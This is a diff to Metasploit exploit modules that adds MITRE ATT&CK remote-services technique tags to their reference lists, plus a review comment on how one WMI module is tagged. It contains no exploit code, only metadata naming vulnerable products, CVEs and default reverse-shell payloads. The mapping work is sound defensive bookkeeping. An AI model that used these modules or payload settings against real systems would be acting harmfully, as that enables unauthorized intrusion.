diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index d909e5ec2c..78e45b09fd 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -42,6 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['CVE', '2015-0936'], ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH], ], 'DisclosureDate' => '2015-04-01', # Not a joke 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index 9986346638..8a0b3b200d 100644 --- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -40,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2016-1560' ], # password [ 'CVE', '2016-1561' ], # private key - [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] + [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'DisclosureDate' => '2016-04-07', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 64125268d4..4d9a508626 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb 
@@ -40,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ], [ 'CVE', '2012-1493' ], [ 'OSVDB', '82780' ], - [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ] + [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'DisclosureDate' => '2012-06-11', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/ibm_drm_a3user.rb b/modules/exploits/linux/ssh/ibm_drm_a3user.rb index c6367baef5..30e1b7c404 100644 --- a/modules/exploits/linux/ssh/ibm_drm_a3user.rb +++ b/modules/exploits/linux/ssh/ibm_drm_a3user.rb @@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'CVE', '2020-4429' ], # insecure default password [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ], [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ], - [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/'] + [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'Payload' => { 'Compat' => { diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index 26060244ed..ac9083ba7b 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb 
@@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => 'xistence ', # Discovery, Metasploit module 'License' => MSF_LICENSE, 'References' => [ - ['PACKETSTORM', '125754'] + ['PACKETSTORM', '125754'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2014-03-17', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb index 47cdebb13f..8eecf43867 100644 --- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb +++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb @@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ [ 'CVE', '2017-9462' ], - ['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29'] + [ 'URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 30732a229f..c8739dbd2f 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -36,7 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => 'xistence ', # Discovery, Metasploit module 'License' => MSF_LICENSE, 'References' => [ - ['PACKETSTORM', '125755'] + ['PACKETSTORM', '125755'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2014-03-17', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb index 13ba188eb9..da03af4598 100644 --- a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb +++ b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb 
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2017-7722'], - ['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'] + ['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' diff --git a/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb b/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb index 9bc3440168..359d62053c 100644 --- a/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb +++ b/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb @@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2025-32433'], ['URL', 'https://x.com/Horizon3Attack/status/1912945580902334793'], ['URL', 'https://platformsecurity.com/blog/CVE-2025-32433-poc'], - ['URL', 'https://github.com/ProDefense/CVE-2025-32433'] + ['URL', 'https://github.com/ProDefense/CVE-2025-32433'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'Platform' => ['linux', 'unix'], 'Arch' => [ARCH_CMD], diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index f6c12aa36b..770f162a9c 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb 
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2012-3579'], ['OSVDB', '85028'], ['BID', '55143'], - ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'] + ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index a9b3eefdff..5b6c212de6 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -36,6 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2016-7456' ], [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ], ], 'DisclosureDate' => '2016-12-20', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb index 64dedec97d..87c70c42f0 100644 --- a/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb @@ -71,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://github.com/sinsinology/CVE-2023-34039'], ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'], ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH], ], 'DisclosureDate' => '2023-08-29', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 
diff --git a/modules/exploits/linux/telnet/netgear_telnetenable.rb b/modules/exploits/linux/telnet/netgear_telnetenable.rb index 110f9f47e1..a3fefa92e7 100644 --- a/modules/exploits/linux/telnet/netgear_telnetenable.rb +++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb @@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'], ['URL', 'https://github.com/cyanitol/netgear-telenetenable'], - ['URL', 'https://github.com/insanid/netgear-telenetenable'] + ['URL', 'https://github.com/insanid/netgear-telenetenable'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2009-10-30', # Python PoC (TCP) 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb index 3bf479a3de..9af284f72a 100644 --- a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb +++ b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb @@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2024-21683'], ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'], ['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'], - ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE'] + ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2024-05-21', 'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default. diff --git a/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb b/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb index 3b9c4da47e..50ba0d0e97 100644 --- a/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb 
+++ b/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb @@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2024-1709'], # Auth bypass to create admin account. ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], # Auth Bypass PoC - ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] # Analysis of both CVEs + ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'], # Analysis of both CVEs + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2024-02-19', 'Platform' => %w[win linux unix], diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index f9602859ab..0d0623d4ab 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -35,7 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2011-0807'], - ['OSVDB', '71948'] + ['OSVDB', '71948'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => ['win', 'linux', 'java'], 'Targets' => [ diff --git a/modules/exploits/multi/http/orientdb_exec.rb b/modules/exploits/multi/http/orientdb_exec.rb index 13587a132d..f894530072 100644 --- a/modules/exploits/multi/http/orientdb_exec.rb +++ b/modules/exploits/multi/http/orientdb_exec.rb 
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2017-11467'], ['URL', 'https://blogs.securiteam.com/index.php/archives/3318'], ['URL', 'http://www.palada.net/index.php/2017/07/13/news-2112/'], - ['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017'] + ['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => %w{linux unix win}, 'Privileged' => false, diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb index 9746025f40..4b89cc57dd 100644 --- a/modules/exploits/multi/http/splunk_mappy_exec.rb +++ b/modules/exploits/multi/http/splunk_mappy_exec.rb @@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'BID', '51061' ], [ 'CVE', '2011-4642' ], [ 'URL', 'http://www.splunk.com/view/SP-CAAAGMM' ], - [ 'URL', 'http://www.sec-1.com/blog/?p=233' ] + [ 'URL', 'http://www.sec-1.com/blog/?p=233' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Payload' => { 'Space' => 1024, diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 952f1230cc..791b77b1a3 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -57,7 +57,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'BID', '36954' ], # tomcat docs - [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ] + [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Platform' => %w{java linux win}, # others? 'Targets' => [ diff --git a/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb b/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb index a4d259e4a7..538d2cdb49 100644 
--- a/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb +++ b/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb @@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/'], ['URL', 'https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/'], ['CVE', '2016-1542'], - ['CVE', '2016-1543'] + ['CVE', '2016-1543'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2016-03-16', 'Privileged' => false, diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 9b712a5219..7868e341e8 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote ), 'Author' => ['Spencer McIntyre', 'Brandon Knight'], 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'License' => MSF_LICENSE, 'Privileged' => true, diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb index 089a3bade8..28b21907fd 100644 --- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb +++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb @@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] ], 'References' => [ - [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/'] + [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ] ], 'DisclosureDate' => '2015-07-10', 'DefaultTarget' => 0, 
diff --git a/modules/exploits/osx/http/remote_for_mac_rce.rb b/modules/exploits/osx/http/remote_for_mac_rce.rb index bf0cfed03f..fa082a92b5 100644 --- a/modules/exploits/osx/http/remote_for_mac_rce.rb +++ b/modules/exploits/osx/http/remote_for_mac_rce.rb @@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => ['Chokri Hammedi (@blue0x1)'], 'References' => [ ['CVE', '2025-34089'], - ['PACKETSTORM', '195347'] + ['PACKETSTORM', '195347'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2025-05-27', 'Platform' => ['unix', 'osx'], diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index 88f8fb932a..21ac02d289 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'CVE', '2007-0882' ], [ 'OSVDB', '31881'], [ 'BID', '22512' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ], ], 'Privileged' => false, 'Platform' => %w[solaris unix], diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 1dced18ec3..ba3fe5cb3f 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2001-0797'], ['OSVDB', '690'], ['BID', '5531'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES], ], 'Privileged' => false, 'Platform' => %w[solaris unix], diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 8e29a8e5df..521d55688b 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb 
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2012-5975'], ['EDB', '23082'], ['OSVDB', '88103'], - ['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12'] + ['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'Payload' => { 'Compat' => diff --git a/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb b/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb index 3d0515a649..c8307a779f 100644 --- a/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb +++ b/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb @@ -61,7 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://github.com/cube0x0/CVE-2021-1675'], ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'], ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'], - ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'] + ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Notes' => { 'AKA' => [ 'PrintNightmare' ], diff --git a/modules/exploits/windows/http/nscp_authenticated_rce.rb b/modules/exploits/windows/http/nscp_authenticated_rce.rb index 7f36aeff45..c2af1caa32 100644 --- a/modules/exploits/windows/http/nscp_authenticated_rce.rb +++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb @@ -30,7 +30,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2025-34079'], - ['EDB', '48360'] + ['EDB', '48360'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => %w[windows], 'Arch' => [ARCH_X64], diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 419413893a..710e06b96e 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb 
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2007-1373'], - ['EDB', '3418'] + ['EDB', '3418'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Privileged' => true, 'DefaultOptions' => { diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb index e09a7fde86..b38bb899e7 100644 --- a/modules/exploits/windows/local/powershell_remoting.rb +++ b/modules/exploits/windows/local/powershell_remoting.rb @@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Local 'Author' => [ 'Ben Campbell' ], 'References' => [ [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) - [ 'OSVDB', '3106'] + [ 'OSVDB', '3106'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb index 61321d6a26..a97682ba5e 100644 --- a/modules/exploits/windows/local/wmi.rb +++ b/modules/exploits/windows/local/wmi.rb @@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Local [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) [ 'OSVDB', '3106'], [ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', diff --git a/modules/exploits/windows/misc/unified_remote_rce.rb b/modules/exploits/windows/misc/unified_remote_rce.rb index 44d3e52e28..6c694585a9 100644 --- a/modules/exploits/windows/misc/unified_remote_rce.rb +++ b/modules/exploits/windows/misc/unified_remote_rce.rb 
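Review bot: In `windows/local/wmi.rb` the new entry uses the parent `T1021_REMOTE_SERVICES`, but ATT&CK tracks WMI-based execution as its own technique, T1047 (Windows Management Instrumentation), and T1021 has no WMI sub-technique. If the module runs its payload through WMI, as the file name and the WMIS/PowerSploit reference suggest, `[ 'ATT&CK', Mitre::Attack::Technique::<constant for T1047> ]` would be the more precise reference. The `powershell_remoting.rb` hunk just before it uses `T1021_006_WINDOWS_REMOTE_MANAGEMENT`, which looks like the right level of detail to mirror.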
@@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'EDB', '49587' ], [ 'URL', 'https://www.unifiedremote.com/' ], [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ], - [ 'CVE', '2022-3229' ] + [ 'CVE', '2022-3229' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'win', diff --git a/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb b/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb index d5aedddd75..ea4eacaab0 100644 --- a/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb +++ b/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb @@ -95,7 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'], ['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html'], ['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER], - ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION] + ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION], + ['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL] ], 'DefaultOptions' => { 'RDP_CLIENT_NAME' => 'ethdev', diff --git a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb index fd4bdc38ea..24dd343da3 100644 --- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb +++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb 
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Spencer McIntyre' # RDP DOPU analysis ], 'References' => [ - ['URL', 'https://github.com/countercept/doublepulsar-detection-script'] + ['URL', 'https://github.com/countercept/doublepulsar-detection-script'], + ['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL] ], 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb b/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb index 883269a3d5..766ad263eb 100644 --- a/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb +++ b/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb @@ -44,7 +44,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ], [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ], [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ], - [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ] + [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', diff --git a/modules/exploits/windows/smb/ipass_pipe_exec.rb b/modules/exploits/windows/smb/ipass_pipe_exec.rb index 145b32662b..59bd0c806e 100644 --- a/modules/exploits/windows/smb/ipass_pipe_exec.rb +++ b/modules/exploits/windows/smb/ipass_pipe_exec.rb 
@@ -30,6 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'OSVDB', '117423' ], [ 'BID', '72265' ], [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', diff --git a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb index a0d905fdb6..3526bea7bc 100644 --- a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb +++ b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb @@ -47,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'], ['URL', 'https://github.com/countercept/doublepulsar-detection-script'], ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'], - ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'] + ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2017-04-14', 